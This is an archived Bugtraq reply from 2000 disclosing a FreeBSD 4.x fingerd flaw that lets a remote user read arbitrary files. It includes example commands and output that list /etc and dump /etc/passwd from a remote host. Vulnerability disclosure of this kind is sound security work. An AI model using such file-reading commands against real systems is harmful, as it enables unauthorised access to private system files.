NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2000-10

Subject: Re: [sa2c

and.or.jp: bin/21704: enabling fingerd makes files world readable]
From: Przemyslaw Frasunek (venglinFREEBSD.LUBLIN.PL)
Date: Tue Oct 03 2000 - 13:18:12 CDT

Next message: Dug Song: "Re: Cisco PIX Firewall allow external users to discover internal IPs"
Previous message: Warner Losh: "Re: BSD chpass"
In reply to: Przemyslaw Frasunek: "[sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Next in thread: Warner Losh: "Re: [sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Reply: Przemyslaw Frasunek: "Re: [sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Reply: Warner Losh: "Re: [sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, Oct 02, 2000 at 08:56:40PM +0200, Przemyslaw Frasunek wrote:
> If finger takes full path name as user name, it prints out contents of
> that file. Because fingerd executes finger as local information
> provider, finger /path/to/filesome.host prints /path/to/file at
> some.host.

BTW. Problem persists only in 4.x branch. Of course, it allows also
to traverse directory structures:

riget:venglin:~> finger /etc/lagoon | strings | head -n 3
[lagoon.freebsd.lublin.pl]
^^^L^^D^A.^^^^B^^^^L^^D^B..^^^^W^A^^T^^D^Hdefaults^^A^^^A
^^^T^^H protocols^^^^B

riget:venglin:~> finger /etc/passwdlagoon | head -n2
[lagoon.freebsd.lublin.pl]
root:*:0:0:Przemyslaw Frasunek:/home/root:/usr/local/bin/tcsh

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglinfreebsd.lublin.pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *

Next message: Dug Song: "Re: Cisco PIX Firewall allow external users to discover internal IPs"
Previous message: Warner Losh: "Re: BSD chpass"
In reply to: Przemyslaw Frasunek: "[sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Next in thread: Warner Losh: "Re: [sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Reply: Przemyslaw Frasunek: "Re: [sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Reply: Warner Losh: "Re: [sa2cand.or.jp: bin/21704: enabling fingerd makes files world readable]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]